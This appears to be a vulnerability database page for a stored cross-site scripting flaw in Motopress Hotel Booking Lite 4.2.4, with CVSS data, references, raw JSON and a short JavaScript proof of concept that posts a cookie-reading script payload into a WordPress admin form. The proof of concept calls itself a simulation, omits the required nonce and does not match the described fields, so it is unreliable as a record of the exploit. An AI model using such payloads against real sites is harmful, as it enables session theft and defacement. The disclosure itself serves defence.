Security Vulnerability Report
CVE-2022-50948 CVSS 6.4 MEDIUM

Published: 2026-05-10 13:16:33
Last Modified: 2026-05-12 14:24:15

Description

Motopress Hotel Booking Lite 4.2.4 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting payloads in accommodation type fields. Attackers can inject script tags through the title and excerpt parameters when creating accommodation types, which execute in the browser when visitors access the accommodations page.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Motopress Hotel Booking Lite 4.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
  PoC for CVE-2022-50948 (Stored XSS)
  Target: Motopress Hotel Booking Lite < 4.2.5
  Description: Inject script into Accommodation Type Title or Excerpt.
-->
<script>
// Simulation of the vulnerable HTTP POST request
// Attacker needs to be logged in with permissions to manage accommodation types
var payload = '<script>alert(document.cookie)<\/script>';
var formData = new FormData();
formData.append('mphb_attribute_title', payload); // Vulnerable parameter: Title
formData.append('mphb_attribute_excerpt', 'Test Accommodation'); // Vulnerable parameter: Excerpt
formData.append('action', 'mphb_add_attribute');
// Nonce and other form fields would be required in a real scenario
fetch('/wp-admin/admin.php?page=mphb_booking_attributes&action=add', {
  method: 'POST',
  body: formData,
  credentials: 'include'
}).then(response => console.log('Payload injected successfully'));
</script>

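References

https://motopress.com/
https://www.exploit-db.com/exploits/50951
https://www.vulncheck.com/advisories/motopress-hotel-booking-lite-stored-cross-site-scripting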

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50948", "sourceIdentifier": "[email protected]", "published": "2026-05-10T13:16:32.657", "lastModified": "2026-05-12T14:24:15.210", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Motopress Hotel Booking Lite 4.2.4 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting payloads in accommodation type fields. Attackers can inject script tags through the title and excerpt parameters when creating accommodation types, which execute in the browser when visitors access the accommodations page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://motopress.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50951", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/motopress-hotel-booking-lite-stored-cross-site-scripting", "source": "[email protected]"}]}}